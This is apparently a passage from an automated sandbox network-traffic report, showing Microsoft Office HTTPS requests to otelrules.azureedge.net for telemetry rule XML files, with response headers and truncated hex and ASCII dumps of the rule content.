                                                                                                                                                                            2024-10-28 18:12:43 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            134192.168.2.45915513.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:43 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:43 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:43 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1360
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                                                                                            ETag: "0x8DC582BEDC8193E"
                                                                                                                                                                            x-ms-request-id: 44b69168-a01e-0098-3739-288556000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181243Z-r1755647c666s72wx0z5rz6s6000000006e00000000084th
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:43 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            135192.168.2.45915413.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:43 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:43 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:43 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1406
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                            ETag: "0x8DC582BEB16F27E"
                                                                                                                                                                            x-ms-request-id: 903d302d-701e-0050-069c-276767000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181243Z-r1755647c66ss75qkr31zpy1kc000000053g0000000038n1
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:43 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            136192.168.2.45915313.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:43 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:43 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:43 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1397
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                            ETag: "0x8DC582BE156D2EE"
                                                                                                                                                                            x-ms-request-id: b4130024-d01e-0082-10a3-26e489000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181243Z-17fbfdc98bbl4n669ut4r27e0800000004yg00000000f82c
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:43 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            137192.168.2.45915713.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:43 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:43 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:43 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1369
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                            ETag: "0x8DC582BE32FE1A2"
                                                                                                                                                                            x-ms-request-id: ef923803-d01e-0017-0d01-29b035000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181243Z-17fbfdc98bbt5dtr27n1qp1eqc00000005g000000000e7mt
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:43 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            138192.168.2.45915813.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:44 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:44 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:44 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1414
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                            ETag: "0x8DC582BE03B051D"
                                                                                                                                                                            x-ms-request-id: 897ec3ad-201e-005d-0167-27afb3000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181244Z-r1755647c66p58nm9wqx75pnms00000004n0000000006593
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:44 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            139192.168.2.45915913.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:44 UTC192OUTGET /rules/rule700750v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:44 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:44 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1377
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
                                                                                                                                                                            ETag: "0x8DC582BEAFF0125"
                                                                                                                                                                            x-ms-request-id: ef1abc9b-501e-0029-5887-28d0b8000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181244Z-17fbfdc98bbgm62892kdp1w19800000004c000000000g1vs
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:44 UTC1377INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            140192.168.2.45916013.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:44 UTC192OUTGET /rules/rule700151v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:44 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:44 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1399
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                            ETag: "0x8DC582BE0A2434F"
                                                                                                                                                                            x-ms-request-id: a3dcd1d1-c01e-0014-6437-29a6a3000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181244Z-17fbfdc98bb2cvg4m0cmab3ecw000000043g00000000a0qf
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:44 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            141192.168.2.45916113.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:44 UTC192OUTGET /rules/rule700150v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:44 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:44 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                            ETag: "0x8DC582BE54CA33F"
                                                                                                                                                                            x-ms-request-id: e9bbe3b2-401e-005b-3496-259c0c000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181244Z-r1755647c664nptf1txg2psens00000004ag0000000013cq
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:44 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            142192.168.2.45916213.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:44 UTC192OUTGET /rules/rule703451v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:44 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:44 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1409
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                            ETag: "0x8DC582BDFC438CF"
                                                                                                                                                                            x-ms-request-id: 623250e5-d01e-00ad-1e9c-27e942000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181244Z-r1755647c66hxv26qums8q8fsw00000003mg000000001ncw
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
